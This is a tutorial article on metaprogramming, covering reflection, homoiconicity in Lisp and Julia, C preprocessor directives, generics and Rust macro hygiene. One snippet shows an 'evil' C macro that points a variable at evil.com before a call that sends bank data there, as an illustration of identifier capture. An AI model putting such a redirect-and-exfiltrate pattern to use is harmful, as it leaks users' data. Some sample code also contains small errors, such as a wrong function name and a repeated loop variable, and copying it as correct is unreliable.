Writing Code: An Introduction to Modern Metaprogramming Theory and Practice

Thinking about the optimal way to explain macros always takes me back to my early programming days and a Python program I wrote. The program’s organization was far from ideal; I had to invoke numerous functions with minor differences, leading to cumbersome code. Back then, I was unknowingly yearning for metaprogramming.

metaprogramming (noun)

Any technique by which a program can treat code as data.

Let’s envision building the back end for a pet owner app using the pet_sdk library. We’ll illustrate the same challenges encountered in my Python project. Our initial Python code helps pet owners buy cat food:

import pet_sdk

cats = pet_sdk.get_cats()
print(f"Found {len(cats)} cats!")
for cat in cats:
    pet_sdk.order_cat_food(cat, amount=cat.food_needed)
Snippet 1: Order Cat Food

With the code confirmed working, we replicate the logic for bird and dog owners, incorporating vet appointment booking:

# An SDK that can give us information about pets - unfortunately, the functions are slightly different for each pet
import pet_sdk

# Get all of the birds, cats, and dogs in the system, respectively
birds = pet_sdk.get_birds()
cats = pet_sdk.get_cats()
dogs = pet_sdk.get_dogs()

for cat in cats:
    print(f"Checking information for cat {cat.name}")

    if cat.hungry():
        pet_sdk.order_cat_food(cat, amount=cat.food_needed)
    
    cat.clean_litterbox()

    if cat.sick():
        available_vets = pet_sdk.find_vets(animal="cat")
        if len(available_vets) > 0:
            vet = available_vets[0]
            vet.book_cat_appointment(cat)

for dog in dogs:
    print(f"Checking information for dog {dog.name}")

    if dog.hungry():
        pet_sdk.order_dog_food(dog, amount=dog.food_needed)
    
    dog.walk()

    if dog.sick():
        available_vets = pet_sdk.find_vets(animal="dog")
        if len(available_vets) > 0:
            vet = available_vets[0]
            vet.book_dog_appointment(dog)

for bird in birds:
    print(f"Checking information for bird {bird.name}")

    if bird.hungry():
        pet_sdk.order_bird_food(bird, amount=bird.food_needed)
    
    bird.clean_cage()

    if bird.sick():
        available_vets = pet_sdk.find_birds(animal="bird")
        if len(available_vets) > 0:
            vet = available_vets[0]
            vet.book_bird_appointment(bird)
Snippet 2: Order Cat, Dog, and Bird Food; Book Vet Appointment

Condensing Snippet 2’s repetitive logic into a loop seems efficient. However, the distinct function names (book_bird_appointment, book_cat_appointment, etc.) make it impossible to dynamically determine the correct function call within the loop:

import pet_sdk

all_animals = pet_sdk.get_birds() + pet_sdk.get_cats() + pet_sdk.get_dogs()

for animal in all_animals:
    # What now?
Snippet 3: What Now?

Imagine an enhanced Python version where we could craft programs capable of automatically generating our desired final code. Picture effortlessly and flexibly manipulating our program as if it were data in a file, a list, or any other typical data type or input:

import pet_sdk

for animal in ["cat", "dog", "bird"]:
    animals = pet_sdk.get_{animal}s() # When animal is "cat", this
                                      # would be pet_sdk.get_cats()

    for animal in animal:
        pet_sdk.order_{animal}_food(animal, amount=animal.food_needed)
        # When animal is "dog" this would be
        # pet_sdk.order_dog_food(dog, amount=dog.food_needed)
Snippet 4: TurboPython: An Imaginary Program

This exemplifies a macro, a feature found in languages like Rust, Julia, and C, but absent in Python.

This scenario perfectly highlights the potential of writing programs that can modify and manipulate their own code. This is the essence of macros, representing one answer to a broader question: How can we empower a program to analyze its code as data and act upon that analysis?

Techniques enabling such introspection collectively fall under “metaprogramming.” This rich subfield in programming language design traces back to the powerful concept of “code as data.”

Reflection: Python’s Redemption

You might argue that while Python lacks macro support, it offers alternative ways to achieve the desired code. For instance, using the isinstance() method, we can identify the class of our animal variable and call the corresponding function:

# An SDK that can give us information about pets - unfortunately, the functions
# are slightly different

import pet_sdk

def process_animal(animal):
    if isinstance(animal, pet_sdk.Cat):
        animal_name_type = "cat"
        order_food_fn = pet_sdk.order_cat_food
        care_fn = animal.clean_litterbox 
    elif isinstance(animal, pet_sdk.Dog):
        animal_name_type = "dog"
        order_food_fn = pet_sdk.order_dog_food
        care_fn = animal.walk
    elif isinstance(animal, pet_sdk.Bird):
        animal_name_type = "bird"
        order_food_fn = pet_sdk.order_bird_food
        care_fn = animal.clean_cage
    else:
        raise TypeError("Unrecognized animal!")
    
    print(f"Checking information for {animal_name_type} {animal.name}")
    if animal.hungry():
        order_food_fn(animal, amount=animal.food_needed)
    
    care_fn()

    if animal.sick():
        available_vets = pet_sdk.find_vets(animal=animal_name_type)
        if len(available_vets) > 0:
            vet = available_vets[0]
            # We still have to check again what type of animal it is
            if isinstance(animal, pet_sdk.Cat):
                vet.book_cat_appointment(animal)
            elif isinstance(animal, pet_sdk.Dog):
                vet.book_dog_appointment(animal)
            else:
                vet.book_bird_appointment(animal)


all_animals = pet_sdk.get_birds() + pet_sdk.get_cats() + pet_sdk.get_dogs()
for animal in all_animals:
    process_animal(animal)
Snippet 5: An Idiomatic Example

This type of metaprogramming, known as reflection, will be revisited later. While still somewhat cumbersome, Snippet 5’s code is more manageable than the repetitive logic in Snippet 2.

Challenge

Using the getattr method, modify the preceding code to call the appropriate order_*_food and book_*_appointment functions dynamically. This arguably makes the code less readable, but if you know Python well, it’s worth thinking about how you might use getattr instead of the isinstance function, and simplify the code.


Homoiconicity: The Lisp Legacy

Languages like Lisp elevate metaprogramming through homoiconicity.

homoiconicity (noun)

The property of a programming language whereby there is no distinction between code and the data on which a program is operating.

Created in 1958, Lisp, short for “LISt Processor,” is the oldest homoiconic language and the second-oldest high-level programming language. Its influence on computing and programming has been profound.

“Emacs is written in Lisp, which is the only computer language that is beautiful.” - Neal Stephenson

Emerging just a year after FORTRAN, in the era of punch cards and room-sized computers, Lisp remains actively used for modern applications today. Its primary creator, John McCarthy, a pioneer in AI, championed its use in the field for many years. Researchers valued its ability to dynamically modify code. While AI research now centers around neural networks and complex statistical models, Lisp’s impact, particularly from the ’60s and ’70s research at MIT and Stanford, shaped the field and continues to resonate.

Lisp introduced early programmers to powerful concepts like recursion, higher-order functions, and linked lists, showcasing the power of a language built on lambda calculus.

These concepts led to an explosion in programming language design, with Edsger Dijkstra famously noting that Lisp “[…] assisted a number of our most gifted fellow humans in thinking previously impossible thoughts.”

Here’s a simple Lisp program (and its Python equivalent) defining a recursive “factorial” function and calling it with input “7”:

LispPython
(defun factorial (n) (if (= n 1) 1 (* n (factorial (- n 1))))) (print (factorial 7))
def factorial(n):
    if n == 1:
        return 1
    else:
        return n * factorial(n-1)

print(factorial(7))

Code as Data

While Lisp popularized recursion and other concepts, homoiconicity, despite its impact, didn’t permeate most modern languages.

The table below contrasts homoiconic functions returning code in Julia and Lisp. Julia, a homoiconic language, shares similarities with languages like Python and Ruby.

The crucial element is the quoting character. Julia utilizes a : (colon), while Lisp uses a ' (single quote):

JuliaLisp
function function_that_returns_code() return :(x + 1) end
(defun function_that_returns_code ()
    '(+ x 1))

The quote adjacent to the main expression ((x + 1) or (+ x 1)) transforms it from directly evaluated code into an abstract expression we can manipulate. The function returns code, not data or a string. Calling print(function_that_returns_code()) in Julia would print the code as a string: x+1 (similarly in Lisp). Omitting the : (or ' in Lisp) would result in an error, as x would be undefined.

Let’s expand our Julia example:

function function_that_returns_code(n)
    return :(x + $n)
end

my_code = function_that_returns_code(3)
print(my_code) # Prints out (x + 3)

x = 1
print(eval(my_code)) # Prints out 4
x = 3
print(eval(my_code)) # Prints out 6
Snippet 6: Julia Example Extended

The eval function executes code generated elsewhere in the program. The printed value depends on the x variable’s definition. Attempting to eval the generated code without defining x would cause an error.

Homoiconicity, a powerful metaprogramming form, enables paradigms where programs adapt dynamically, generating code for specific problems or new data formats.

Consider WolframAlpha, where the homoiconic Wolfram Language generates code to tackle a vast array of problems. Ask “What’s the GDP of New York City divided by the population of Andorra?”, and you receive a logical answer.

It’s unlikely this obscure calculation resides in a database. Wolfram leverages metaprogramming and an ontological knowledge graph to dynamically generate code for the answer.

Understanding the flexibility and power of Lisp and other homoiconic languages is crucial. Before delving further, let’s review available metaprogramming options:

 DefinitionExamplesNotes
HomoiconicityA language characteristic in which code is “first-class” data. Since there is no separation between code and data, the two can be used interchangeably.
  • Lisp
  • Prolog
  • Julia
  • Rebol/Red
  • Wolfram Language
Here, Lisp includes other languages in the Lisp family, like Scheme, Racket, and Clojure.
MacrosA statement, function, or expression that takes code as input and returns code as output.
  • Rust’s macro_rules!, Derive, and procedural macros
  • Julia’s @macro invocations
  • Lisp’s defmacro
  • C’s #define
(See the next note about C’s macros.)
Preprocessor Directives (or Precompiler)A system that takes a program as input and, based on statements included in the code, returns a changed version of the program as output.
  • C’s macros
  • C++’s # preprocessor system
C’s macros are implemented using C’s preprocessor system, but the two are separate concepts.

The key conceptual difference between C’s macros (in which we use the #define preprocessor directive) and other forms of C preprocessor directives (e.g., #if and #ifndef) is that we use the macros to generate code while using other non-#define preprocessor directives to conditionally compile other code. The two are closely related in C and in some other languages, but they’re different types of metaprogramming.
ReflectionA program’s ability to examine, modify, and introspect its own code.
  • Python’s isinstance, getattr, functions
  • JavaScript’s Reflect and typeof
  • Java’s getDeclaredMethods
  • .NET’s System.Type class hierarchy
Reflection can occur at compile time or at run time.
GenericsThe ability to write code that’s valid for a number of different types or that can be used in multiple contexts but stored in one place. We can define the contexts in which the code is valid either explicitly or implicitly.

Template-style generics:

  • C++
  • Rust
  • Java

Parametric polymorphism:

  • Haskell
  • ML
Generic programming is a broader topic than generic metaprogramming, and the line between the two isn’t well defined.

In this author’s view, a parametric type system only counts as metaprogramming if it’s in a statically typed language.
A Reference for Metaprogramming

Let’s examine hands-on homoiconicity, macros, preprocessor directives, reflection, and generics examples in various languages:

# Prints out "Hello Will", "Hello Alice", by dynamically creating the lines of code
say_hi = :(println("Hello, ", name))

name = "Will"
eval(say_hi)

name = "Alice"
eval(say_hi)
Snippet 7: Homoiconicity in Julia
int main() {
#ifdef _WIN32
    printf("This section will only be compiled for and run on windows!\n");
    windows_only_function();
#elif __unix__
    printf("This section will only be compiled for and run on unix!\n");
    unix_only_function();
#endif
    printf("This line runs regardless of platform!\n");
    return 1;
}
Snippet 8: Preprocessor Directives in C
from pet_sdk import Cat, Dog, get_pet

pet = get_pet()

if isinstance(pet, Cat):
    pet.clean_litterbox()
elif isinstance(pet, Dog):
    pet.walk()
else:
    print(f"Don't know how to help a pet of type {type(pet)}")
Snippet 9: Reflection in Python
import com.example.coordinates.*;

interface Vehicle {
    public String getName();
    public void move(double xCoord, double yCoord);
}

public class VehicleDriver<T extends Vehicle> {
    // This class is valid for any other class T which implements
    // the Vehicle interface
    private final T vehicle;

    public VehicleDriver(T vehicle) {
        System.out.println("VehicleDriver: " + vehicle.getName());
        this.vehicle = vehicle;
    }

    public void goHome() {
        this.vehicle.move(HOME_X, HOME_Y);
    }

    public void goToStore() {
        this.vehicle.move(STORE_X, STORE_Y);
    }
    
}
Snippet 10: Generics in Java
macro_rules! print_and_return_if_true {
    ($val_to_check: ident, $val_to_return: expr) => {
        if ($val_to_check) {
            println!("Val was true, returning {}", $val_to_return);
            return $val_to_return;
        }
    }
}

// The following is the same as if for each of x, y, and z,
// we wrote if x { println!...}
fn example(x: bool, y: bool, z: bool) -> i32 {
    print_and_return_if_true!(x, 1);
    print_and_return_if_true!(z, 2);
    print_and_return_if_true!(y, 3);
}
Snippet 11: Macros in Rust

Macros, like the one in Snippet 11, are regaining popularity in newer languages. A key consideration for their development is hygiene.

Hygienic and Unhygienic Macros

What constitutes “hygienic” or “unhygienic” code? Let’s examine a Rust macro instantiated with the macro_rules! function. As the name suggests, macro_rules! generates code based on defined rules. Our macro, named my_macro, follows the rule: “Create the code line let x = $n”, where n is the input:

macro_rules! my_macro {
    ($n) => {
        let x = $n;
    }
}

fn main() {
    let x = 5;
    my_macro!(3);
    println!("{}", x);
}
Snippet 12: Hygiene in Rust

Expanding the macro (replacing its invocation with the generated code) should yield:

fn main() {
    let x = 5;
    let x = 3; // This is what my_macro!(3) expanded into
    println!("{}", x);
}
Snippet 13: Our Example, Expanded

Our macro seemingly redefines variable x to 3, suggesting the program should print 3. However, it prints 5! Surprisingly, Rust’s macro_rules! is hygienic with respect to identifiers. It wouldn’t “capture” identifiers outside its scope, which in this case is x. Had it been captured, x would equal 3.

hygiene (noun)

A property guaranteeing that a macro’s expansion will not capture identifiers or other states from beyond the macro’s scope. Macros and macro systems that do not provide this property are called unhygienic.

Hygiene in macros sparks debate among developers. Proponents argue that it prevents accidental modification of code behavior. Imagine a complex macro, used in intricate code with numerous variables and identifiers. What if it unknowingly used the same variable as your code?

Developers often use macros from external libraries without reading the source code, especially in newer languages like Rust and Julia:

#define EVIL_MACRO website="https://evil.com";

int main() {
    char *website = "https://good.com";
    EVIL_MACRO
    send_all_my_bank_data_to(website);
    return 1;
}
Snippet 14: An Evil C Macro

This unhygienic C macro captures and modifies the website identifier. Identifier capture isn’t inherently malicious; it’s an unintended consequence of macro use.

So, are hygienic macros good and unhygienic ones bad? It’s not that simple. Hygienic macros can be limiting. Revisiting Snippet 2, where pet_sdk serves three pet types, our initial code was:

birds = pet_sdk.get_birds()
cats = pet_sdk.get_cats()
dogs = pet_sdk.get_dogs()

for cat in cats:
    # Cat specific code
for dog in dogs:
    # Dog specific code
# etc…
Snippet 15: Back to the Vet—Recalling pet sdk

Recall Snippet 3’s attempt to condense this logic into a loop. If our code relied on cats and dogs identifiers, we might want something like:

{animal}s = pet_sdk.get{animal}s()
for {animal} in {animal}s:
    # {animal} specific code
Snippet 16: Useful Identifier Capture (in Imaginary "TurboPython")

While simplified, imagine needing a macro to generate a significant code portion. Hygienic macros might hinder such cases.

The hygienic versus unhygienic debate is nuanced. Fortunately, the language dictates whether your macros are hygienic. Keep this in mind when using them.

Modern Macros Resurgence

Macros are experiencing a revival. Modern imperative languages shifted away from them, favoring other metaprogramming forms.

Languages like Python and Java, taught in schools, emphasized reflection and generics.

Macros became associated with daunting C/C++ preprocessor syntax, often fading into obscurity.

However, Rust and Julia are changing this. These modern, accessible languages have redefined and popularized macros with fresh ideas. Julia, in particular, shows promise as a versatile language, potentially replacing Python and R.

Revisiting pet_sdk through our “TurboPython” lens, Julia is what we envisioned. Let’s rewrite Snippet 2 using its homoiconicity and other metaprogramming tools:

using pet_sdk

for (pet, care_fn) = (("cat", :clean_litterbox), ("dog", :walk_dog), ("dog", :clean_cage))
    get_pets_fn = Meta.parse("pet_sdk.get_${pet}s")
    @eval begin
        local animals = $get_pets_fn() #pet_sdk.get_cats(), pet_sdk.get_dogs(), etc.
        for animal in animals
            animal.$care_fn # animal.clean_litterbox(), animal.walk_dog(), etc.
        end
    end
end
Snippet 17: The Power of Julia’s Macros—Making pet_sdk Work for Us

Breaking down Snippet 17:

  1. We iterate over three tuples. For ("cat", :clean_litterbox), pet becomes "cat", and care_fn is assigned the quoted symbol :clean_litterbox.
  2. Meta.parse converts a string into an Expression, allowing evaluation as code. String interpolation dynamically defines the function call.
  3. eval runs the generated code. @eval begin… end is an alternative to eval(...). The code within the @eval block is generated and executed dynamically.

Julia’s metaprogramming offers expressive freedom. We could’ve used reflection (like Snippet 5’s Python example) or written a macro generating code for a specific animal, or even generated the entire code as a string using Meta.parse.

Beyond Julia: Other Modern Metaprogramming Systems

While compelling, Julia isn’t the sole example of a modern macro system. Rust prominently features macros.

In Rust, macros are almost unavoidable for idiomatic code, unlike Julia where they are optional.

This centrality led to a thriving macro ecosystem in Rust. Developers have created impressive libraries, proofs of concept, and features, including tools for data serialization/deserialization, automatic SQL generation, and even converting code annotations to other languages – all generated at compile time.

While Julia might be more expressive, Rust exemplifies a modern language embracing metaprogramming as a core aspect.

Looking Ahead

It’s an exciting time for programming languages. We can run C++ applications in web browsers and JavaScript applications on desktops and phones. Barriers to entry are lower, and resources for new programmers are abundant.

This freedom of choice allows us to leverage modern languages that incorporate features and concepts from computer science history. The resurgence of macros in this environment is thrilling. It will be fascinating to witness the innovations of a new generation of developers introduced to macros through Rust and Julia.

Remember, “code as data” is more than a buzzword. It’s a fundamental principle in metaprogramming.

“‘Code as data’ is more than just a catchphrase.”

Metaprogramming’s 64-year journey has been crucial to programming’s evolution. While this exploration merely scratches the surface, it highlights the power and potential of modern metaprogramming.

Licensed under CC BY-NC-SA 4.0